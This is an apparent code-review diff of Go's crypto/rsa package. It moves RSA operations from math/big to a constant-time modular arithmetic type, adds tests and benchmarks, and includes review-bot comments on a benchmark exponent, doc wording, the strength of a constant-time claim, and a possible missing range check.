++ err := quick.Check(testModAddCommutative, &quick.Config{})
++ if err != nil {
++ t.Error(err)
++ }
++}
++
++func testModSubThenAddIdentity(a *nat, b *nat) bool {
++ mLimbs := make([]uint, len(a.limbs))
++ for i := 0; i < len(mLimbs); i++ {
++ mLimbs[i] = _MASK
++ }
++ m := modulusFromNat(&nat{mLimbs})
++ original := a.clone()
++ a.modSub(b, m)
++ a.modAdd(b, m)
++ return a.cmpEq(original) == 1
++}
++
++func TestModSubThenAddIdentity(t *testing.T) {
++ err := quick.Check(testModSubThenAddIdentity, &quick.Config{})
++ if err != nil {
++ t.Error(err)
++ }
++}
++
++func testMontgomeryRoundtrip(a *nat) bool {
++ one := &nat{make([]uint, len(a.limbs))}
++ one.limbs[0] = 1
++ aPlusOne := a.clone()
++ aPlusOne.add(1, one)
++ m := modulusFromNat(aPlusOne)
++ monty := a.clone()
++ monty.montgomeryRepresentation(m)
++ aAgain := monty.clone()
++ aAgain.montgomeryMul(monty, one, m)
++ return a.cmpEq(aAgain) == 1
++}
++
++func TestMontgomeryRoundtrip(t *testing.T) {
++ err := quick.Check(testMontgomeryRoundtrip, &quick.Config{})
++ if err != nil {
++ t.Error(err)
++ }
++}
++
++func TestFromBig(t *testing.T) {
++ expected := []byte{0x01, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff}
++ theBig := new(big.Int).SetBytes(expected)
++ actual := natFromBig(theBig).fillBytes(make([]byte, len(expected)))
++ if !bytes.Equal(actual, expected) {
++ t.Errorf("%+x != %+x", actual, expected)
++ }
++}
++
++func TestFillBytes(t *testing.T) {
++ xBytes := []byte{0xAA, 0xFF, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88}
++ x := natFromBytes(xBytes)
++ for l := 20; l >= len(xBytes); l-- {
++ buf := make([]byte, l)
++ rand.Read(buf)
++ actual := x.fillBytes(buf)
++ expected := make([]byte, l)
++ copy(expected[l-len(xBytes):], xBytes)
++ if !bytes.Equal(actual, expected) {
++ t.Errorf("%d: %+v != %+v", l, actual, expected)
++ }
++ }
++ for l := len(xBytes) - 1; l >= 0; l-- {
++ (func() {
++ defer func() {
++ if recover() == nil {
++ t.Errorf("%d: expected panic", l)
++ }
++ }()
++ x.fillBytes(make([]byte, l))
++ })()
++ }
++}
++
++func TestFromBytes(t *testing.T) {
++ f := func(xBytes []byte) bool {
++ if len(xBytes) == 0 {
++ return true
++ }
++ actual := natFromBytes(xBytes).fillBytes(make([]byte, len(xBytes)))
++ if !bytes.Equal(actual, xBytes) {
++ t.Errorf("%+x != %+x", actual, xBytes)
++ return false
++ }
++ return true
++ }
++
++ err := quick.Check(f, &quick.Config{})
++ if err != nil {
++ t.Error(err)
++ }
++
++ f([]byte{0xFF, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88})
++ f(bytes.Repeat([]byte{0xFF}, _W))
++}
++
++func TestShiftIn(t *testing.T) {
++ if bits.UintSize != 64 {
++ t.Skip("examples are only valid in 64 bit")
++ }
++ examples := []struct {
++ m, x, expected []byte
++ y uint64
++ }{{
++ m: []byte{13},
++ x: []byte{0},
++ y: 0x7FFF_FFFF_FFFF_FFFF,
++ expected: []byte{7},
++ }, {
++ m: []byte{13},
++ x: []byte{7},
++ y: 0x7FFF_FFFF_FFFF_FFFF,
++ expected: []byte{11},
++ }, {
++ m: []byte{0x06, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d},
++ x: make([]byte, 9),
++ y: 0x7FFF_FFFF_FFFF_FFFF,
++ expected: []byte{0x00, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff},
++ }, {
++ m: []byte{0x06, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d},
++ x: []byte{0x00, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff},
++ y: 0,
++ expected: []byte{0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08},
++ }}
++
++ for i, tt := range examples {
++ m := modulusFromNat(natFromBytes(tt.m))
++ got := natFromBytes(tt.x).expandFor(m).shiftIn(uint(tt.y), m)
++ if got.cmpEq(natFromBytes(tt.expected).expandFor(m)) != 1 {
++ t.Errorf("%d: got %x, expected %x", i, got, tt.expected)
++ }
++ }
++}
++
++func TestModulusAndNatSizes(t *testing.T) {
++ // These are 126 bit (2 * _W on 64-bit architectures) values, serialized as
++ // 128 bits worth of bytes. If leading zeroes are stripped, they fit in two
++ // limbs, if they are not, they fit in three. This can be a problem because
++ // modulus strips leading zeroes and nat does not.
++ m := modulusFromNat(natFromBytes([]byte{
++ 0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
++ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff}))
++ x := natFromBytes([]byte{
++ 0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
++ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe})
++ x.expandFor(m) // must not panic for shrinking
++}
++
++func TestExpand(t *testing.T) {
++ sliced := []uint{1, 2, 3, 4}
++ examples := []struct {
++ in []uint
++ n int
++ out []uint
++ }{{
++ []uint{1, 2},
++ 4,
++ []uint{1, 2, 0, 0},
++ }, {
++ sliced[:2],
++ 4,
++ []uint{1, 2, 0, 0},
++ }, {
++ []uint{1, 2},
++ 2,
++ []uint{1, 2},
++ }, {
++ []uint{1, 2, 0},
++ 2,
++ []uint{1, 2},
++ }}
++
++ for i, tt := range examples {
++ got := (&nat{tt.in}).expand(tt.n)
++ if len(got.limbs) != len(tt.out) || got.cmpEq(&nat{tt.out}) != 1 {
++ t.Errorf("%d: got %x, expected %x", i, got, tt.out)
++ }
++ }
++}
++
++func TestMod(t *testing.T) {
++ m := modulusFromNat(natFromBytes([]byte{0x06, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d}))
++ x := natFromBytes([]byte{0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01})
++ out := new(nat)
++ out.mod(x, m)
++ expected := natFromBytes([]byte{0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x09})
++ if out.cmpEq(expected) != 1 {
++ t.Errorf("%+v != %+v", out, expected)
++ }
++}
++
++func TestModSub(t *testing.T) {
++ m := modulusFromNat(&nat{[]uint{13}})
++ x := &nat{[]uint{6}}
++ y := &nat{[]uint{7}}
++ x.modSub(y, m)
++ expected := &nat{[]uint{12}}
++ if x.cmpEq(expected) != 1 {
++ t.Errorf("%+v != %+v", x, expected)
++ }
++ x.modSub(y, m)
++ expected = &nat{[]uint{5}}
++ if x.cmpEq(expected) != 1 {
++ t.Errorf("%+v != %+v", x, expected)
++ }
++}
++
++func TestModAdd(t *testing.T) {
++ m := modulusFromNat(&nat{[]uint{13}})
++ x := &nat{[]uint{6}}
++ y := &nat{[]uint{7}}
++ x.modAdd(y, m)
++ expected := &nat{[]uint{0}}
++ if x.cmpEq(expected) != 1 {
++ t.Errorf("%+v != %+v", x, expected)
++ }
++ x.modAdd(y, m)
++ expected = &nat{[]uint{7}}
++ if x.cmpEq(expected) != 1 {
++ t.Errorf("%+v != %+v", x, expected)
++ }
++}
++
++func TestExp(t *testing.T) {
++ m := modulusFromNat(&nat{[]uint{13}})
++ x := &nat{[]uint{3}}
++ out := &nat{[]uint{0}}
++ out.exp(x, []byte{12}, m)
++ expected := &nat{[]uint{1}}
++ if out.cmpEq(expected) != 1 {
++ t.Errorf("%+v != %+v", out, expected)
++ }
++}
++
++func makeBenchmarkModulus() *modulus {
++ m := make([]uint, 32)
++ for i := 0; i < 32; i++ {
++ m[i] = _MASK
++ }
++ return modulusFromNat(&nat{limbs: m})
++}
++
++func makeBenchmarkValue() *nat {
++ x := make([]uint, 32)
++ for i := 0; i < 32; i++ {
++ x[i] = _MASK - 1
++ }
++ return &nat{limbs: x}
++}
++
++func makeBenchmarkExponent() []byte {
++ e := make([]byte, 256)
++ for i := 0; i < 32; i++ {
++ e[i] = 0xFF
++ }
++ return e
++}
++
++func BenchmarkModAdd(b *testing.B) {
++ x := makeBenchmarkValue()
++ y := makeBenchmarkValue()
++ m := makeBenchmarkModulus()
++
++ b.ResetTimer()
++ for i := 0; i < b.N; i++ {
++ x.modAdd(y, m)
++ }
++}
++
++func BenchmarkModSub(b *testing.B) {
++ x := makeBenchmarkValue()
++ y := makeBenchmarkValue()
++ m := makeBenchmarkModulus()
++
++ b.ResetTimer()
++ for i := 0; i < b.N; i++ {
++ x.modSub(y, m)
++ }
++}
++
++func BenchmarkMontgomeryRepr(b *testing.B) {
++ x := makeBenchmarkValue()
++ m := makeBenchmarkModulus()
++
++ b.ResetTimer()
++ for i := 0; i < b.N; i++ {
++ x.montgomeryRepresentation(m)
++ }
++}
++
++func BenchmarkMontgomeryMul(b *testing.B) {
++ x := makeBenchmarkValue()
++ y := makeBenchmarkValue()
++ out := makeBenchmarkValue()
++ m := makeBenchmarkModulus()
++
++ b.ResetTimer()
++ for i := 0; i < b.N; i++ {
++ out.montgomeryMul(x, y, m)
++ }
++}
++
++func BenchmarkModMul(b *testing.B) {
++ x := makeBenchmarkValue()
++ y := makeBenchmarkValue()
++ m := makeBenchmarkModulus()
++
++ b.ResetTimer()
++ for i := 0; i < b.N; i++ {
++ x.modMul(y, m)
++ }
++}
++
++func BenchmarkExpBig(b *testing.B) {
++ out := new(big.Int)
++ exponentBytes := makeBenchmarkExponent()
++ x := new(big.Int).SetBytes(exponentBytes)
++ e := new(big.Int).SetBytes(exponentBytes)
++ n := new(big.Int).SetBytes(exponentBytes)
++ one := new(big.Int).SetUint64(1)
++ n.Add(n, one)
++
++ b.ResetTimer()
++ for i := 0; i < b.N; i++ {
++ out.Exp(x, e, n)
++ }
++}
++
++func BenchmarkExp(b *testing.B) {
++ x := makeBenchmarkValue()
++ e := makeBenchmarkExponent()
++ out := makeBenchmarkValue()
++ m := makeBenchmarkModulus()
++
++ b.ResetTimer()
++ for i := 0; i < b.N; i++ {
++ out.exp(x, e, m)
++ }
++}
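Review bot: `makeBenchmarkExponent` allocates `e := make([]byte, 256)` but its loop stops at `i < 32`, so only the 32 most significant bytes are 0xFF and the other 224 stay zero. The bound 32 is the limb count used by `makeBenchmarkModulus` and `makeBenchmarkValue`, which suggests it was carried over rather than chosen for a byte slice. `BenchmarkExpBig` reuses these bytes for base, exponent and modulus, and `big.Int.Exp` is not constant-time, so a sparse exponent may skew the comparison with `BenchmarkExp`. If a dense exponent is intended, use `for i := range e { e[i] = 0xFF }`; if the sparse one is deliberate, add a comment such as `// only the top 256 bits of the 2048-bit exponent are set`.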
+diff --git a/src/crypto/rsa/pkcs1v15.go b/src/crypto/rsa/pkcs1v15.go
+index a216be3..ce89f92 100644
+--- a/src/crypto/rsa/pkcs1v15.go
++++ b/src/crypto/rsa/pkcs1v15.go
+@@ -9,7 +9,6 @@ import (
+ "crypto/subtle"
+ "errors"
+ "io"
+- "math/big"
+
+ "crypto/internal/randutil"
+ )
+@@ -58,14 +57,11 @@ func EncryptPKCS1v15(rand io.Reader, pub *PublicKey, msg []byte) ([]byte, error)
+ em[len(em)-len(msg)-1] = 0
+ copy(mm, msg)
+
+- m := new(big.Int).SetBytes(em)
+- c := encrypt(new(big.Int), pub, m)
+-
+- return c.FillBytes(em), nil
++ return encrypt(pub, em), nil
+ }
+
+ // DecryptPKCS1v15 decrypts a plaintext using RSA and the padding scheme from PKCS#1 v1.5.
+-// If rand != nil, it uses RSA blinding to avoid timing side-channel attacks.
++// The rand parameter is legacy and ignored, and it can be as nil.
+ //
+ // Note that whether this function returns an error or not discloses secret
+ // information. If an attacker can cause this function to run repeatedly and
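Review bot: The replacement doc line `// The rand parameter is legacy and ignored, and it can be as nil.` is ungrammatical and gives no reason, although the sentence it replaces told callers that a non-nil rand enabled blinding against timing side channels. A caller reading only this comment cannot tell whether that protection was dropped or moved elsewhere. Suggest `// The rand parameter is legacy and ignored, and it can be nil; timing protection no longer depends on it.`, assuming the constant-time claim in the new package comment holds. The same sentence is added on DecryptPKCS1v15SessionKey and SignPKCS1v15 in this file and on DecryptOAEP in rsa.go.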
+@@ -76,7 +72,7 @@ func DecryptPKCS1v15(rand io.Reader, priv *PrivateKey, ciphertext []byte) ([]byt
+ if err := checkPub(&priv.PublicKey); err != nil {
+ return nil, err
+ }
+- valid, out, index, err := decryptPKCS1v15(rand, priv, ciphertext)
++ valid, out, index, err := decryptPKCS1v15(priv, ciphertext)
+ if err != nil {
+ return nil, err
+ }
+@@ -87,7 +83,7 @@ func DecryptPKCS1v15(rand io.Reader, priv *PrivateKey, ciphertext []byte) ([]byt
+ }
+
+ // DecryptPKCS1v15SessionKey decrypts a session key using RSA and the padding scheme from PKCS#1 v1.5.
+-// If rand != nil, it uses RSA blinding to avoid timing side-channel attacks.
++// The rand parameter is legacy and ignored, and it can be as nil.
+ // It returns an error if the ciphertext is the wrong length or if the
+ // ciphertext is greater than the public modulus. Otherwise, no error is
+ // returned. If the padding is valid, the resulting plaintext message is copied
+@@ -114,7 +110,7 @@ func DecryptPKCS1v15SessionKey(rand io.Reader, priv *PrivateKey, ciphertext []by
+ return ErrDecryption
+ }
+
+- valid, em, index, err := decryptPKCS1v15(rand, priv, ciphertext)
++ valid, em, index, err := decryptPKCS1v15(priv, ciphertext)
+ if err != nil {
+ return err
+ }
+@@ -130,26 +126,24 @@ func DecryptPKCS1v15SessionKey(rand io.Reader, priv *PrivateKey, ciphertext []by
+ return nil
+ }
+
+-// decryptPKCS1v15 decrypts ciphertext using priv and blinds the operation if
+-// rand is not nil. It returns one or zero in valid that indicates whether the
+-// plaintext was correctly structured. In either case, the plaintext is
+-// returned in em so that it may be read independently of whether it was valid
+-// in order to maintain constant memory access patterns. If the plaintext was
+-// valid then index contains the index of the original message in em.
+-func decryptPKCS1v15(rand io.Reader, priv *PrivateKey, ciphertext []byte) (valid int, em []byte, index int, err error) {
++// decryptPKCS1v15 decrypts ciphertext using priv. It returns one or zero in
++// valid that indicates whether the plaintext was correctly structured.
++// In either case, the plaintext is returned in em so that it may be read
++// independently of whether it was valid in order to maintain constant memory
++// access patterns. If the plaintext was valid then index contains the index of
++// the original message in em, to allow constant time padding removal.
++func decryptPKCS1v15(priv *PrivateKey, ciphertext []byte) (valid int, em []byte, index int, err error) {
+ k := priv.Size()
+ if k < 11 {
+ err = ErrDecryption
+ return
+ }
+
+- c := new(big.Int).SetBytes(ciphertext)
+- m, err := decrypt(rand, priv, c)
++ em, err = decrypt(priv, ciphertext)
+ if err != nil {
+ return
+ }
+
+- em = m.FillBytes(make([]byte, k))
+ firstByteIsZero := subtle.ConstantTimeByteEq(em[0], 0)
+ secondByteIsTwo := subtle.ConstantTimeByteEq(em[1], 2)
+
+@@ -221,8 +215,7 @@ var hashPrefixes = map[crypto.Hash][]byte{
+ // function. If hash is zero, hashed is signed directly. This isn't
+ // advisable except for interoperability.
+ //
+-// If rand is not nil then RSA blinding will be used to avoid timing
+-// side-channel attacks.
++// The rand parameter is legacy and ignored, and it can be as nil.
+ //
+ // This function is deterministic. Thus, if the set of possible
+ // messages is small, an attacker may be able to build a map from
+@@ -249,13 +242,7 @@ func SignPKCS1v15(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed []b
+ copy(em[k-tLen:k-hashLen], prefix)
+ copy(em[k-hashLen:k], hashed)
+
+- m := new(big.Int).SetBytes(em)
+- c, err := decryptAndCheck(rand, priv, m)
+- if err != nil {
+- return nil, err
+- }
+-
+- return c.FillBytes(em), nil
++ return decryptAndCheck(priv, em)
+ }
+
+ // VerifyPKCS1v15 verifies an RSA PKCS#1 v1.5 signature.
+@@ -275,9 +262,7 @@ func VerifyPKCS1v15(pub *PublicKey, hash crypto.Hash, hashed []byte, sig []byte)
+ return ErrVerification
+ }
+
+- c := new(big.Int).SetBytes(sig)
+- m := encrypt(new(big.Int), pub, c)
+- em := m.FillBytes(make([]byte, k))
++ em := encrypt(pub, sig)
+ // EM = 0x00 || 0x01 || PS || 0x00 || T
+
+ ok := subtle.ConstantTimeByteEq(em[0], 0)
+diff --git a/src/crypto/rsa/pss.go b/src/crypto/rsa/pss.go
+index 814522d..eaba4be 100644
+--- a/src/crypto/rsa/pss.go
++++ b/src/crypto/rsa/pss.go
+@@ -12,7 +12,6 @@ import (
+ "errors"
+ "hash"
+ "io"
+- "math/big"
+ )
+
+ // Per RFC 8017, Section 9.1
+@@ -207,19 +206,27 @@ func emsaPSSVerify(mHash, em []byte, emBits, sLen int, hash hash.Hash) error {
+ // Note that hashed must be the result of hashing the input message using the
+ // given hash function. salt is a random sequence of bytes whose length will be
+ // later used to verify the signature.
+-func signPSSWithSalt(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed, salt []byte) ([]byte, error) {
+- emBits := priv.N.BitLen() - 1
++func signPSSWithSalt(priv *PrivateKey, hash crypto.Hash, hashed, salt []byte) ([]byte, error) {
++ emBits := bigBitLen(priv.N) - 1
+ em, err := emsaPSSEncode(hashed, emBits, salt, hash.New())
+ if err != nil {
+ return nil, err
+ }
+- m := new(big.Int).SetBytes(em)
+- c, err := decryptAndCheck(rand, priv, m)
+- if err != nil {
+- return nil, err
++
++ // RFC 8017: "Note that the octet length of EM will be one less than k if
++ // modBits - 1 is divisible by 8 and equal to k otherwise, where k is the
++ // length in octets of the RSA modulus n."
++ //
++ // This is extremely annoying, as all other encrypt and decrypt inputs are
++ // always the exact same size as the modulus. Since it only happens for
++ // weird modulus sizes, fix it by padding inefficiently.
++ if emLen, k := len(em), priv.Size(); emLen < k {
++ emNew := make([]byte, k)
++ copy(emNew[k-emLen:], em)
++ em = emNew
+ }
+- s := make([]byte, priv.Size())
+- return c.FillBytes(s), nil
++
++ return decryptAndCheck(priv, em)
+ }
+
+ const (
+@@ -269,7 +276,7 @@ func SignPSS(rand io.Reader, priv *PrivateKey, hash crypto.Hash, digest []byte,
+ saltLength := opts.saltLength()
+ switch saltLength {
+ case PSSSaltLengthAuto:
+- saltLength = (priv.N.BitLen()-1+7)/8 - 2 - hash.Size()
++ saltLength = (bigBitLen(priv.N)-1+7)/8 - 2 - hash.Size()
+ case PSSSaltLengthEqualsHash:
+ saltLength = hash.Size()
+ }
+@@ -278,7 +285,7 @@ func SignPSS(rand io.Reader, priv *PrivateKey, hash crypto.Hash, digest []byte,
+ if _, err := io.ReadFull(rand, salt); err != nil {
+ return nil, err
+ }
+- return signPSSWithSalt(rand, priv, hash, digest, salt)
++ return signPSSWithSalt(priv, hash, digest, salt)
+ }
+
+ // VerifyPSS verifies a PSS signature.
+@@ -291,13 +298,22 @@ func VerifyPSS(pub *PublicKey, hash crypto.Hash, digest []byte, sig []byte, opts
+ if len(sig) != pub.Size() {
+ return ErrVerification
+ }
+- s := new(big.Int).SetBytes(sig)
+- m := encrypt(new(big.Int), pub, s)
+- emBits := pub.N.BitLen() - 1
++
++ emBits := bigBitLen(pub.N) - 1
+ emLen := (emBits + 7) / 8
+- if m.BitLen() > emLen*8 {
+- return ErrVerification
++ em := encrypt(pub, sig)
++
++ // Like in signPSSWithSalt, deal with mismatches between emLen and the size
++ // of the modulus. The spec would have us wire emLen into the encoding
++ // function, but we'd rather always encode to the size of the modulus and
++ // then strip leading zeroes if necessary. This only happens for weird
++ // modulus sizes anyway.
++ for len(em) > emLen && len(em) > 0 {
++ if em[0] != 0 {
++ return ErrVerification
++ }
++ em = em[1:]
+ }
+- em := m.FillBytes(make([]byte, emLen))
++
+ return emsaPSSVerify(digest, em, emBits, opts.saltLength(), hash.New())
+ }
+diff --git a/src/crypto/rsa/pss_test.go b/src/crypto/rsa/pss_test.go
+index c3a6d46..d018b43 100644
+--- a/src/crypto/rsa/pss_test.go
++++ b/src/crypto/rsa/pss_test.go
+@@ -233,7 +233,10 @@ func TestPSSSigning(t *testing.T) {
+ }
+ }
+
+-func TestSignWithPSSSaltLengthAuto(t *testing.T) {
++func TestPSS513(t *testing.T) {
++ // See Issue 42741, and separately, RFC 8017: "Note that the octet length of
++ // EM will be one less than k if modBits - 1 is divisible by 8 and equal to
++ // k otherwise, where k is the length in octets of the RSA modulus n."
+ key, err := GenerateKey(rand.Reader, 513)
+ if err != nil {
+ t.Fatal(err)
+@@ -246,8 +249,9 @@ func TestSignWithPSSSaltLengthAuto(t *testing.T) {
+ if err != nil {
+ t.Fatal(err)
+ }
+- if len(signature) == 0 {
+- t.Fatal("empty signature returned")
++ err = VerifyPSS(&key.PublicKey, crypto.SHA256, digest[:], signature, nil)
++ if err != nil {
++ t.Error(err)
+ }
+ }
+
+diff --git a/src/crypto/rsa/rsa.go b/src/crypto/rsa/rsa.go
+index 5a00ed2..29d9d31 100644
+--- a/src/crypto/rsa/rsa.go
++++ b/src/crypto/rsa/rsa.go
+@@ -19,13 +19,17 @@
+ // over the public key primitive, the PrivateKey type implements the
+ // Decrypter and Signer interfaces from the crypto package.
+ //
+-// The RSA operations in this package are not implemented using constant-time algorithms.
++// Operations in this package are implemented using constant-time algorithms,
++// except for [GenerateKey], [PrivateKey.Precompute], and [PrivateKey.Validate].
++// Every other operation only leaks the bit size of the involved values, which
++// all depend on the selected key size.
+ package rsa
+
+ import (
+ "crypto"
+ "crypto/rand"
+ "crypto/subtle"
++ "encoding/binary"
+ "errors"
+ "hash"
+ "io"
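Review bot: The new package comment says operations only leak `the bit size of the involved values, which all depend on the selected key size`, which reads stronger than what the rewritten `decrypt` in this patch admits. Its own comment says that passing `priv.D.Bytes()`, `Dp.Bytes()` and `Dq.Bytes()` may leak the exact bit length of the private exponents, and those lengths belong to the individual key, not to the chosen key size alone. Suggest naming this at package level, for example `// Every other operation only leaks the bit size of the involved values, including the bit length of the private exponents.`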
+@@ -35,7 +39,6 @@ import (
+ "crypto/internal/randutil"
+ )
+
+-var bigZero = big.NewInt(0)
+ var bigOne = big.NewInt(1)
+
+ // A PublicKey represents the public part of an RSA key.
+@@ -47,7 +50,7 @@ type PublicKey struct {
+ // Size returns the modulus size in bytes. Raw signatures and ciphertexts
+ // for or by this public key will have the same size.
+ func (pub *PublicKey) Size() int {
+- return (pub.N.BitLen() + 7) / 8
++ return (bigBitLen(pub.N) + 7) / 8
+ }
+
+ // OAEPOptions is an interface for passing options to OAEP decryption using the
+@@ -351,10 +354,19 @@ func mgf1XOR(out []byte, hash hash.Hash, seed []byte) {
+ // too large for the size of the public key.
+ var ErrMessageTooLong = errors.New("crypto/rsa: message too long for RSA public key size")
+
+-func encrypt(c *big.Int, pub *PublicKey, m *big.Int) *big.Int {
+- e := big.NewInt(int64(pub.E))
+- c.Exp(m, e, pub.N)
+- return c
++func encrypt(pub *PublicKey, plaintext []byte) []byte {
++
++ N := modulusFromNat(natFromBig(pub.N))
++ m := natFromBytes(plaintext).expandFor(N)
++
++ e := make([]byte, 8)
++ binary.BigEndian.PutUint64(e, uint64(pub.E))
++ for len(e) > 1 && e[0] == 0 {
++ e = e[1:]
++ }
++
++ out := make([]byte, modulusSize(N))
++ return new(nat).exp(m, e, N).fillBytes(out)
+ }
+
+ // EncryptOAEP encrypts the given message with RSA-OAEP.
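Review bot: `encrypt` takes `natFromBytes(plaintext).expandFor(N)` straight into `exp` without the range check that the new `decrypt` applies to its input (`c.cmpGeq(N.nat) == 1`). VerifyPKCS1v15 and VerifyPSS pass `sig` here, and the only visible check before the call is on its length, so a signature of the right length but numerically >= N would reach `exp`. Whether `exp` gives a defined result for an unreduced base is decided in nat.go, outside this hunk, and should be confirmed. If it needs a reduced input, the old `big.Int.Exp` call did not have that precondition, so either `encrypt` should return an error for `m >= N` or the two verify paths should reject such signatures with ErrVerification first. The function has no doc comment; stating the precondition there would help the next caller.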
+@@ -404,12 +416,7 @@ func EncryptOAEP(hash hash.Hash, random io.Reader, pub *PublicKey, msg []byte, l
+ mgf1XOR(db, hash, seed)
+ mgf1XOR(seed, hash, db)
+
+- m := new(big.Int)
+- m.SetBytes(em)
+- c := encrypt(new(big.Int), pub, m)
+-
+- out := make([]byte, k)
+- return c.FillBytes(out), nil
++ return encrypt(pub, em), nil
+ }
+
+ // ErrDecryption represents a failure to decrypt a message.
+@@ -451,98 +458,71 @@ func (priv *PrivateKey) Precompute() {
+ }
+ }
+
+-// decrypt performs an RSA decryption, resulting in a plaintext integer. If a
+-// random source is given, RSA blinding is used.
+-func decrypt(random io.Reader, priv *PrivateKey, c *big.Int) (m *big.Int, err error) {
+- // TODO(agl): can we get away with reusing blinds?
+- if c.Cmp(priv.N) > 0 {
+- err = ErrDecryption
+- return
++// decrypt performs an RSA decryption of ciphertext into out.
++func decrypt(priv *PrivateKey, ciphertext []byte) ([]byte, error) {
++
++ N := modulusFromNat(natFromBig(priv.N))
++ c := natFromBytes(ciphertext).expandFor(N)
++ if c.cmpGeq(N.nat) == 1 {
++ return nil, ErrDecryption
+ }
+ if priv.N.Sign() == 0 {
+ return nil, ErrDecryption
+ }
+
+- var ir *big.Int
+- if random != nil {
+- randutil.MaybeReadByte(random)
+-
+- // Blinding enabled. Blinding involves multiplying c by r^e.
+- // Then the decryption operation performs (m^e * r^e)^d mod n
+- // which equals mr mod n. The factor of r can then be removed
+- // by multiplying by the multiplicative inverse of r.
+-
+- var r *big.Int
+- ir = new(big.Int)
+- for {
+- r, err = rand.Int(random, priv.N)
+- if err != nil {
+- return
+- }
+- if r.Cmp(bigZero) == 0 {
+- r = bigOne
+- }
+- ok := ir.ModInverse(r, priv.N)
+- if ok != nil {
+- break
+- }
+- }
+- bigE := big.NewInt(int64(priv.E))
+- rpowe := new(big.Int).Exp(r, bigE, priv.N) // N != 0
+- cCopy := new(big.Int).Set(c)
+- cCopy.Mul(cCopy, rpowe)
+- cCopy.Mod(cCopy, priv.N)
+- c = cCopy
+- }
+-
++ // Note that because our private decryption exponents are stored as big.Int,
++ // we potentially leak the exact number of bits of these exponents. This
++ // isn't great, but should be fine.
+ if priv.Precomputed.Dp == nil {
+- m = new(big.Int).Exp(c, priv.D, priv.N)
+- } else {
+- // We have the precalculated values needed for the CRT.
+- m = new(big.Int).Exp(c, priv.Precomputed.Dp, priv.Primes[0])
+- m2 := new(big.Int).Exp(c, priv.Precomputed.Dq, priv.Primes[1])
+- m.Sub(m, m2)
+- if m.Sign() < 0 {
+- m.Add(m, priv.Primes[0])
+- }
+- m.Mul(m, priv.Precomputed.Qinv)
+- m.Mod(m, priv.Primes[0])
+- m.Mul(m, priv.Primes[1])
+- m.Add(m, m2)
+-
+- for i, values := range priv.Precomputed.CRTValues {
+- prime := priv.Primes[2+i]
+- m2.Exp(c, values.Exp, prime)
+- m2.Sub(m2, m)
+- m2.Mul(m2, values.Coeff)
+- m2.Mod(m2, prime)
+- if m2.Sign() < 0 {
+- m2.Add(m2, prime)
+- }
+- m2.Mul(m2, values.R)
+- m.Add(m, m2)
+- }
+- }
+-
+- if ir != nil {
+- // Unblind.
+- m.Mul(m, ir)
+- m.Mod(m, priv.N)
+- }
+-
+- return
++ out := make([]byte, modulusSize(N))
++ return new(nat).exp(c, priv.D.Bytes(), N).fillBytes(out), nil
++ }
++
++ t0 := new(nat)
++ P := modulusFromNat(natFromBig(priv.Primes[0]))
++ Q := modulusFromNat(natFromBig(priv.Primes[1]))
++ // m = c ^ Dp mod p
++ m := new(nat).exp(t0.mod(c, P), priv.Precomputed.Dp.Bytes(), P)
++ // m2 = c ^ Dq mod q
++ m2 := new(nat).exp(t0.mod(c, Q), priv.Precomputed.Dq.Bytes(), Q)
++ // m = m - m2 mod p
++ m.modSub(t0.mod(m2, P), P)
++ // m = m * Qinv mod p
++ m.modMul(natFromBig(priv.Precomputed.Qinv).expandFor(P), P)
++ // m = m * q mod N
++ m.expandFor(N).modMul(t0.mod(Q.nat, N), N)
++ // m = m + m2 mod N
++ m.modAdd(m2.expandFor(N), N)
++
++ for i, values := range priv.Precomputed.CRTValues {
++ p := modulusFromNat(natFromBig(priv.Primes[2+i]))
++ // m2 = c ^ Exp mod p
++ m2.exp(t0.mod(c, p), values.Exp.Bytes(), p)
++ // m2 = m2 - m mod p
++ m2.modSub(t0.mod(m, p), p)
++ // m2 = m2 * Coeff mod p
++ m2.modMul(natFromBig(values.Coeff).expandFor(p), p)
++ // m2 = m2 * R mod N
++ R := natFromBig(values.R).expandFor(N)
++ m2.expandFor(N).modMul(R, N)
++ // m = m + m2 mod N
++ m.modAdd(m2, N)
++ }
++
++ out := make([]byte, modulusSize(N))
++ return m.fillBytes(out), nil
+ }
+
+-func decryptAndCheck(random io.Reader, priv *PrivateKey, c *big.Int) (m *big.Int, err error) {
+- m, err = decrypt(random, priv, c)
++func decryptAndCheck(priv *PrivateKey, ciphertext []byte) (m []byte, err error) {
++ m, err = decrypt(priv, ciphertext)
+ if err != nil {
+ return nil, err
+ }
+
+ // In order to defend against errors in the CRT computation, m^e is
+ // calculated, which should match the original ciphertext.
+- check := encrypt(new(big.Int), &priv.PublicKey, m)
+- if c.Cmp(check) != 0 {
++ check := encrypt(&priv.PublicKey, m)
++ if subtle.ConstantTimeCompare(ciphertext, check) != 1 {
+ return nil, errors.New("rsa: internal error")
+ }
+ return m, nil
